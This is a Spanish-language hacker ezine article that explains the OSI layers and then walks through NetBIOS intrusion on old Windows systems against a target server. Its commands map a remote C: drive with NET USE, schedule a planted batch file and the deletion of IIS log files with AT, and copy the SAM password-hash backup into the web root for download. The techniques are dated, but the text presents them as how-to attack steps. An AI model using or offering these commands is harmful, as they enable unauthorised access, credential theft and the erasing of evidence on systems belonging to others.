Copy Link
Add to Bookmark
Report

SWP 1.2: Netbios

eZine's profile picture
Published in 
Security Wari Projects
 · 2 years ago

--=[ xyz4a3 ]=--

Lo mas dificil siempre es dar el Primer paso para empezar algo, pasado esto ya estanos al otro lado, es asi como empezamos este texto, dificil de empezar, pero vamos a ver como seguimos adelante.

Cada uno Navega tranquilamente con su Pc por Internet, Que hay detras ????

1) Niveles OSI

  • a. Aplicacion
  • b. Presentacion
  • c. Sesion
  • d. Transporte
  • e. Red
  • f. Enlace
  • g. Fisica

Fisica
Es el Medio Fisico ( Tarjeta Red,Cable,Hub etc ), el cual se encargara de verificar si esta Activo o no un medio Fisico, algo mas electrico.


Enlace
Se Encargara de Transmitir tramas de Informacion para asegurar que la comunicacion entre los medios fisicos exista, Estara prendido su Server??
> Ping xx.xx.xx.xx xD, Para esos que les gusta el Ping de la Muerte.


Red
Es el que se va a encargar de "Encaminar" el Paquete de Datos entre los nodos sin importarle el contenido.


Transporte
Es la que se encarga de recepcionar los Datos de la Capa Sesion, pasarlos por la red y asegurar que lleguen OK, Ya escucharon del NetCat????


sesión
Se encargara de Administrar el Dialogo entre los 2 nodos, es decir el Inicio y Fin de la comunicacion.


Presentación
Como no somos marcianos para entender lo que llega por la Red (Aunque conozco algunos ), este nivel se encarga de presentarnos los datos entendible en los formatos que Utilize (ASCII,EBCDIC Etc ).


Aplicación
Este nivel es el mas cristiano, donde nos entendemos con el equipo (ftp,http,etc), y todos utilizamos.


La Curiosidad nos lleva a Aplicar estos Conceptos, vamos poco a poco conociendolos:

Ahora Veremos un POCO de NETBIOS, PAra Luego Pasar a los Servicios y de ahi hacia adelante.

NETBIOS

Ahora que entendemos un poco estos niveles, vamos como los aplicariamos, como dije, Su Server estara prendido??

   > ping -a www.miserverfavorito.com.pe        // -a para resolver la direccion

Disparando contra miserverfavorito.com.pe [200.xx.xxx.xx] com 32 bytes de dados:

     Resposta de 200.xx.xxx.xx:bytes=32 tempo=738ms Tempo de vida=49 
Resposta de 200.xx.xxx.xx:bytes=32 tempo=705ms Tempo de vida=49
Resposta de 200.xx.xxx.xx:bytes=32 tempo=714ms Tempo de vida=49
Resposta de 200.xx.xxx.xx:bytes=32 tempo=710ms Tempo de vida=49

EstatÌsticas do Ping para 200.xx.xxx.xx:
Pacotes: Enviados = 4, Recebidos = 4, Perdidos = 0 (0% de perda),
Tempos aproximados de ida e volta em milissegundos:
MÌnimo = 705ms, M·ximo = 738ms, MÈdia = 716ms

Ahora ya sabemos quien es, Pero cual sera el nombre de su red???

   > NBTSTAT -A 200.xx.xxx.xx 
NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
COMERCIAL1 <00> UNIQUE Registered
GRUPO01 <00> GROUP Registered
COMERCIAL1 <03> UNIQUE Registered
COMERCIAL1 <20> UNIQUE Registered
GRUPO01 <1E> GROUP Registered
GRUPO01 <1D> GROUP Registered
.._MSBROWSE__. <01> GROUP


MAC Address = 00-E0-53-54-00-00

Bueno eso no sirve casi de nada, Sabemos el Nombre del Server (<03>) y que existe el GRUPO01 de Trabajo, y es una red M$ (Como casi todas ) , Ahora como saben una Pc comun y Silvestre puede Compartir su HD,CD etc , Pero un Server es muy dificil que encuentren eso (Hay cada caso..), Ahora en Windoze NT existen muchos recursos compartidos que no necesariamente son Disco, Por ejemplo IPC$ y/o Printers etc. Como conectarse a ellos? en tu \WINDOW$\LMHOST adicionas:

   <EDITAR> : 200.xx.xxx.xx PC01 #PRE #DOM:GRUPO01

Luego Ejecutas :

   >NBTSTAT -R        // Para referescar la Tabla 

NetBIOS Names Resolution and Registration Statistics
----------------------------------------------------

Resolved By Broadcast = 3
Resolved By Name Server = 0
Registered By Broadcast = 28
Registered By Name Server = 0

NetBIOS Names Resolved By Broadcast
---------------------------------------------
COMERCIAL1
COMERCIAL1 <00>
COMERCIAL1

mmmm, Que estara compartido????

   >NET VIEW \\COMERCIAL1 

Recursos compartilhados em \\COMERCIAL1

Nome comp. Tipo Comentario
----------------------------------------
C-DRIVE Disco
EPSONLQ800 Impress„o
O comando foi concluÌdo com Íxito.

Ahora ya sabes los recursos que comparte, bueno, si quieres trabajar tranquilo, asignale una Unidad

   >NET USE x: \\COMERCIAL1\C-DRIVE 
>NET USE
Status Nome local Nome remoto
----------------------------------------------------
OK X: \\COMERCIAL1\C-DRIVE
O comando foi concluÌdo com Íxito.

Todo Este NETBIOS , Sera desde tu Box Win9x , Pero en un NT le agregan unos Comandos mas, Como Dominio , Users Etc.

		WIn9x					WinNT 

NET VIEW \\computador NET VIEW \\Computador /DOMAIN
NET USE [Unidad:] \\Computadora\folder NET USE [Unidad:] \\computador\folder
/USER:dominio\Username

Es bueno saber en un NT ciertos comandos, de los varios que tiene :

NET START [Servicio] 

EVENTLOG
FTP SERVER
SCHEDULER // Importante para dejar una Tareita despues de las 00:00 horas
// En una ruta conocida por Uds. :)


AT // Para programar a que hora se ejecutara

AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"

Ejemplo:


> AT 00:15 C:\InetPub\WWWRoot\bachero.bat // ó
> AT 00:15 del C:\Winnt\System32\LogFiles\w3svc1\*.log

Como sabemos el Win9x tiene su COMMAND.COM y el NT tiene su CMD.EXE, estos nos permitiran el Shell en dichos sistemas Operativos, asi en el NT tenemos:

CMD [/X | /Y] [/A | /U] [/Q] [[/C | /K] string]

El mas Usado en los Exploits para dar Shell, es el CMD /C , El Cual ejecutara el Comando dado en [String] y Terminara. Ejemplo :

>cmd /c rdisk /S- 
>cmd /c copy c:\winnt\repair\sam._ c:\inetput\wwwroot // Download ??? :)

Bueno senores, Es una pequena vista del NetBios.....Ahi nos vemos ...

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT